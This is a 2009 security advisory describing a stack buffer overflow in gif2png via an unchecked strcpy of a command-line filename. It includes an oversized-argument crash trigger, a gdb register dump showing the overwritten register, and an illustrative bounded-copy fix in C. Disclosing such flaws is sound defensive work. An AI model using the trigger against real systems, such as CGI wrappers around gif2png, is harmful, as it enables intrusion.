POSTED BY: Patroklos Argyroudis / 14.10.2009

gif2png command line buffer overflow

CENSUS ID: CENSUS-2009-0006
CVE ID: CVE-2009-5018
Affected Products: gif2png versions ≤ 2.5.1.
Class: Improper Input Validation (CWE-20), Failure to Constrain Operations within the Bounds of a Memory Buffer (CWE-119)
Remote: Yes (when gif2png is used by CGI programs)
Discovered by: Patroklos Argyroudis

We have discovered an “improper input validation” vulnerability in the gif2png utility that leads to a stack buffer overflow.

Details

gif2png is a utility that converts files from the Graphic Interchange Format (GIF) to Portable Network Graphics (PNG).

gif2png (up to and including version 2.5.1) is prone to a command line buffer overflow: a strcpy(3) call copies user-supplied data into a fixed-size buffer without checking its length against the buffer's size. Here is a transcript of triggering the bug:

[argp@hegel /tmp]$ gif2png `python -c 'print "A"*2048'`
Segmentation fault (core dumped)
[argp@hegel /tmp]$ gdb -q gif2png -c core
(no debugging symbols found)

warning: Can't read pathname for load map: Input/output error.
Reading symbols from /usr/lib/libpng12.so.0...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libpng12.so.0
Reading symbols from /lib/i686/cmov/libm.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i686/cmov/libm.so.6
Reading symbols from /usr/lib/libz.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /lib/i686/cmov/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
(no debugging symbols found)
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0xb7e6c6ed in ?? () from /lib/i686/cmov/libc.so.6
gdb $ i r
eax            0x41414141   0x41414141
ecx            0xb7f5960c   0xb7f5960c
edx            0xbfffe960   0xbfffe960
ebx            0xb7f57ff4   0xb7f57ff4
esp            0xbfffe384   0xbfffe384
ebp            0xbfffe3d8   0xbfffe3d8
esi            0xb7f3b1da   0xb7f3b1da
edi            0xb7f3b1e4   0xb7f3b1e4
eip            0xb7e6c6ed   0xb7e6c6ed
eflags         0x10206  [ PF IF RF ]
cs             0x73 0x73
ss             0x7b 0x7b
ds             0x7b 0x7b
es             0x7b 0x7b
fs             0x0  0x0
gs             0x33 0x33

The bug is in gif2png.c at line 901, strcpy(name, argv[i]), where name is a fixed-size char array.
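As an added illustration (not code from gif2png or from this advisory), the following shows the shape of the defect beside a bounded replacement: a filename argument is refused when it does not fit the destination buffer, including the terminating NUL, rather than copied. The buffer size NAME_MAX_LEN and the function names are assumptions made for the example; the advisory does not state the real size of name.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Assumed size of the fixed stack buffer; the advisory does not give the
 * real value, so this is a placeholder for the example. */
#define NAME_MAX_LEN 256

/* Bounded replacement for the unchecked strcpy(name, argv[i]) pattern.
 * Returns 1 if src (plus its NUL) fits in dst, 0 if the copy is refused.
 * Nothing is written to dst on refusal, so the caller cannot use a
 * partially filled buffer by mistake. */
int copy_filename_checked(char *dst, size_t dstsize, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dstsize == 0)
        return 0;

    /* strnlen bounds the scan so an unterminated source cannot run off. */
    len = strnlen(src, dstsize);
    if (len >= dstsize)          /* no room for the terminating NUL */
        return 0;

    memcpy(dst, src, len);
    dst[len] = '\0';
    return 1;
}

/* Simulated argument handling: the length check happens before any use of
 * the buffer, which is exactly what the original strcpy(3) call omitted. */
int process_filename_arg(const char *arg)
{
    char name[NAME_MAX_LEN];

    if (!copy_filename_checked(name, sizeof name, arg)) {
        fprintf(stderr, "gif2png: filename too long (limit %zu bytes)\n",
                sizeof name - 1);
        return 0;
    }
    /* ... open and convert `name` here ... */
    return 1;
}

/* Longest filename the check accepts: buffer size minus the NUL. */
size_t max_accepted_filename_len(void) { return NAME_MAX_LEN - 1; }

/* Helper for checking behaviour at the boundary: constructs a filename of
 * n bytes (n < 4096) and reports whether process_filename_arg accepts it. */
int accepts_filename_of_length(size_t n)
{
    char probe[4096];

    if (n >= sizeof probe)
        return 0;
    memset(probe, 'A', n);
    probe[n] = '\0';
    return process_filename_arg(probe);
}

int main(int argc, char **argv)
{
    int i, ok = 1;

    for (i = 1; i < argc; i++)
        if (!process_filename_arg(argv[i]))
            ok = 0;
    return ok ? 0 : 1;
}
```

The same check applies to any program that hands an externally supplied string to a fixed-size buffer; when gif2png is driven from a CGI wrapper, the argument length is attacker-controlled, so rejecting over-long input before the copy is the fix rather than trusting the caller.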

This may have security repercussions if gif2png is configured as a handler for other applications that pass user-supplied filenames to gif2png on the command line (e.g. a CGI program).